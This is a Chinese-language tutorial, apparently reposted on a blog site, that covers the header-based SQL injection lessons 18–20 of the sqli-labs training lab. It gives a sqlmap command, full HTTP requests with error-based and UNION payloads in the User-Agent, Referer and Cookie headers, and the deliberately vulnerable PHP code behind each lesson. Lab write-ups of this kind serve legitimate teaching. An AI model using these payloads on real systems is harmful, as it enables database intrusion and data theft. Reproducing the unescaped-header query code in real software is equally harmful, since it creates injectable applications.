Mysql sql inject入门篇sqli-labs使用 part 418-20

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Mysql sql inject入门篇sqli-labs使用 part 418-20相关的知识,希望对你有一定的参考价值。

这几关的注入点产生位置大多在HTTP头位置处

常见的HTTP注入点产生位置为【Referer】、【X-Forwarded-For】、【Cookie】、【X-Real-IP】、【Accept-Language】、【Authorization】;

  • Less-18 Header Injection- Error Based- string

1)工具用法: 
注入点在user-agent处,所以使用sqlmap -r参数就可以了,将请求的测试数据包保存成1.txt,然后在user-agent字段处加个*号。然后输入下列命令就可以使用工具注入

    • sqlmap -r 1.txt –current-db –threads 10 –batch –technique BEST

测试数据包 1.txt

POST /hacker/sqli-labs-master/Less-18/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0*
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/hacker/sqli-labs-master/Less-18/index.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
 
uname=admin&passwd=admin&submit=Submit

  

2)手工注入 
前面的字段前篇一律,只要有错误回显得话,匹配好单引号可以直接使用updatexml爆错语句验证注入点;

POST /hacker/sqli-labs-master/Less-18/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0‘ and updatexml(1,concat(0x7e,database()),1) and ‘11‘=‘11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/hacker/sqli-labs-master/Less-18/index.php
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
 
uname=admin&passwd=admin&submit=Submit

  

3)注入点产生代码

//检查值是否为空,不为空使用mysql_real_escape_string函数对输入的值进行过滤
function check_input($value) {
    if (!empty($value)) {
        // truncation (see comments)
        $value = substr($value, 0, 20);
    }
    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc()) {
        $value = stripslashes($value);
    }
    // Quote if not a number
    if (!ctype_digit($value)) {
        $value = "‘".mysql_real_escape_string($value)."‘";
    } else {
        $value = intval($value);
    }
    return $value;
}
$uagent = $_SERVER[‘HTTP_USER_AGENT‘];
$IP = $_SERVER[‘REMOTE_ADDR‘];
echo "<br>";
echo ‘Your IP ADDRESS is: ‘.$IP;
echo "<br>";
//echo ‘Your User Agent is: ‘ .$uagent;
// take the variables
if (isset($_POST[‘uname‘]) && isset($_POST[‘passwd‘])) {
    $uname = check_input($_POST[‘uname‘]);
    $passwd = check_input($_POST[‘passwd‘]);
    //logging the connection parameters to a file for analysis.
    $fp = fopen(‘result.txt‘, ‘a‘);
    fwrite($fp, ‘User Agent:‘.$uname."\n");
    fclose($fp);
    $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    if ($row1) {
        echo ‘<font color= "#FFFF00" font size = 3 >‘;
        $insert = "INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES (‘$uagent‘, ‘$IP‘, $uname)"; //注入点产生位置
        mysql_query($insert);

 

-Less-19 Header Injection- Referer- Error Based- string 

这一关的注入点产生在referer处,主要为用insert语句写入时未判断。。

 
Referer:‘ AND (SELECT 1690 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,54)),0x717a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘qmQA‘=‘qmQA

 

Playload

所使用的注入语句

完整的HTTP请求包

POST /sqli-labs-master/Less-19/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/sqli-labs-master/Less-19/‘ and updatexml(1,concat(0x7e,database(),0x7e),1) and ‘1‘=‘1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
uname=admin&passwd=admin&submit=Submit

  

核心代码

function check_input($value) {
    if (!empty($value)) {
        // truncation (see comments)
        $value = substr($value, 0, 20);
    }
    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc()) {
        $value = stripslashes($value);
    }
    // Quote if not a number
    if (!ctype_digit($value)) {
        $value = "‘".mysql_real_escape_string($value)."‘";
    } else {
        $value = intval($value);
    }
    return $value;
}
$uagent = $_SERVER[‘HTTP_REFERER‘];
$IP = $_SERVER[‘REMOTE_ADDR‘];
echo "<br>";
echo ‘Your IP ADDRESS is: ‘.$IP;
echo "<br>";
//echo ‘Your User Agent is: ‘ .$uagent;
// take the variables
if (isset($_POST[‘uname‘]) && isset($_POST[‘passwd‘])) {
    $uname = check_input($_POST[‘uname‘]);
    $passwd = check_input($_POST[‘passwd‘]);
    $fp = fopen(‘result.txt‘, ‘a‘);
    fwrite($fp, ‘Referer:‘.$uname."\n");
    fclose($fp);
    $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
    if ($row1) {
        echo ‘<font color= "#FFFF00" font size = 3 >‘;
        $insert = "INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (‘$uagent‘, ‘$IP‘)"; //注入点产生处
        mysql_query($insert);

  

-Less-20 Cookie Injection- Error Based- string 
Playload

Cookie:Dumb-4829‘ UNION ALL SELECT NULL,CONCAT(0x7170786271,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x7176706271),NULL-- -

  

核心代码

1、接收用户名,密码;
2、如果正确,设定用户名作为cookies值
3、查询数据库中有没有相关的用户名等于cookies名


144-147行代码
$cookee = base64_decode($cookee);
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=(‘$cookee‘) LIMIT 0,1";
$result=mysql_query($sql);
...
188-189代码
echo " Your Cookie is deleted";
setcookie(‘uname‘, base64_encode($row1[‘username‘]), time()-3600);

  

以上是关于Mysql sql inject入门篇sqli-labs使用 part 418-20的主要内容,如果未能解决你的问题,请参考以下文章

Mysql sql inject入门篇sqli-labs使用 part 315-17

Mysql sql inject入门篇sqli-labs使用 part 418-20

Pikahu-SQL注入模块(Sql inject)(实验实战篇)

mysql之SQL入门与提升——终结篇,函数

MySQL从入门到精通高级篇MySQL的SQL语句执行流程

MySQL从入门到精通高级篇MySQL的SQL语句执行流程